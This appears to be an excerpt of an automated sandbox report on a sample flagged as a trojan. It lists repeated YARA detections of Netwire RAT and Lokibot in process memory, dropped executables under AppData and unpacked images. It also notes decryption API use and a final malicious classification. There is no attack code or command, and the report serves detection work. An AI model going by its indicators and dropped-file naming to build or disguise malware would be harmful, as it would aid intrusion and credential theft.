        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dllJump to behavior
        Source: 00000004.00000002.492113138.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000004.00000002.492113138.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000004.00000002.492113138.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000004.00000002.492113138.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 00000001.00000002.230924749.0000000000F9F000.00000004.00000020.sdmp, type: MEMORYMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000001.00000002.230924749.0000000000F9F000.00000004.00000020.sdmp, type: MEMORYMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000001.00000002.230924749.0000000000F9F000.00000004.00000020.sdmp, type: MEMORYMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000001.00000002.230924749.0000000000F9F000.00000004.00000020.sdmp, type: MEMORYMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000B.00000002.271949091.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 0000000B.00000002.271949091.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 0000000B.00000002.271949091.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000B.00000002.271949091.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000B.00000000.271440623.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 0000000B.00000000.271440623.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 0000000B.00000000.271440623.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000B.00000000.271440623.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 00000003.00000002.232283165.0000000000F30000.00000004.00000040.sdmp, type: MEMORYMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000003.00000002.232283165.0000000000F30000.00000004.00000040.sdmp, type: MEMORYMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000003.00000002.232283165.0000000000F30000.00000004.00000040.sdmp, type: MEMORYMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000003.00000002.232283165.0000000000F30000.00000004.00000040.sdmp, type: MEMORYMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000000.231241127.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000004.00000000.231241127.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000004.00000000.231241127.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000004.00000000.231241127.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 00000006.00000000.253998973.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000006.00000000.253998973.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000006.00000000.253998973.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000006.00000000.253998973.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 00000003.00000002.231997731.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000003.00000002.231997731.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000003.00000002.231997731.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000003.00000002.231997731.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 00000003.00000000.230213286.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000003.00000000.230213286.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000003.00000000.230213286.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000003.00000000.230213286.000000000041E000.00000008.00020000.sdmp, type: MEMORYMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 00000006.00000002.254616303.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000006.00000002.254616303.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 00000006.00000002.254616303.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000006.00000002.254616303.000000000041E000.00000004.00020000.sdmp, type: MEMORYMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: Process Memory Space: Host.exe PID: 7148, type: MEMORYMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: Process Memory Space: Host.exe PID: 7148, type: MEMORYMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: Process Memory Space: Host.exe PID: 7148, type: MEMORYMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: Process Memory Space: Host.exe PID: 7148, type: MEMORYMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: Process Memory Space: Host.exe PID: 5832, type: MEMORYMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: Process Memory Space: Host.exe PID: 5832, type: MEMORYMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: Process Memory Space: Host.exe PID: 5832, type: MEMORYMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: Process Memory Space: Host.exe PID: 5832, type: MEMORYMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: Process Memory Space: StartUpHost.exe PID: 7124, type: MEMORYMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: Process Memory Space: StartUpHost.exe PID: 7124, type: MEMORYMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: Process Memory Space: StartUpHost.exe PID: 7124, type: MEMORYMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: Process Memory Space: StartUpHost.exe PID: 7124, type: MEMORYMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: Process Memory Space: Host.exe PID: 6772, type: MEMORYMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: Process Memory Space: Host.exe PID: 6772, type: MEMORYMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: Process Memory Space: Host.exe PID: 6772, type: MEMORYMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: Process Memory Space: Host.exe PID: 6772, type: MEMORYMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: C:\Users\user\AppData\Roaming\Install\Host.exe, type: DROPPEDMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: C:\Users\user\AppData\Roaming\Install\Host.exe, type: DROPPEDMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: C:\Users\user\AppData\Roaming\Install\Host.exe, type: DROPPEDMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: C:\Users\user\AppData\Roaming\Install\Host.exe, type: DROPPEDMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe, type: DROPPEDMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe, type: DROPPEDMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe, type: DROPPEDMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exe, type: DROPPEDMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPEDMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
        Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPEDMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
        Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPEDMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
        Source: 11.2.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 11.2.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 11.2.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 2.0.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
        Source: 2.0.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
        Source: 2.0.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
        Source: 6.0.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 6.0.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 6.0.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 6.0.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 4.0.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 4.0.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 4.0.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 4.0.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 3.0.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 3.0.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 3.0.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.0.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 4.2.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 4.2.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 4.2.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 4.2.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 3.2.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 3.2.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 3.2.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 3.2.StartUpHost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 2.2.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
        Source: 2.2.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
        Source: 11.0.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 11.0.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 11.0.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.0.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: 6.2.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Suspicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 6.2.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Malicious_BAT_Strings date = 2018-01-05, author = Florian Roth, description = Detects a string also used in Netwire RAT auxilliary, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://pastebin.com/8qaiyPxs
        Source: 6.2.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 6.2.Host.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: netwire author = JPCERT/CC Incident Response Group, description = detect netwire in memory, rule_usage = memory scan, reference = internal research
        Source: SecuriteInfo.com.Trojan.MulDrop.1161.895.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: SecuriteInfo.com.Trojan.MulDrop.1161.895.exe, u0023u0023.csCryptographic APIs: 'CreateDecryptor'
        Source: SecuriteInfo.com.Trojan.MulDrop.1161.895.exe, u0023u0023.csCryptographic APIs: 'TransformFinalBlock'
        Source: 0.0.SecuriteInfo.com.Trojan.MulDrop.1161.895.exe.ee0000.0.unpack, u0023u0023.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.0.SecuriteInfo.com.Trojan.MulDrop.1161.895.exe.ee0000.0.unpack, u0023u0023.csCryptographic APIs: 'TransformFinalBlock'
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/7@4/2
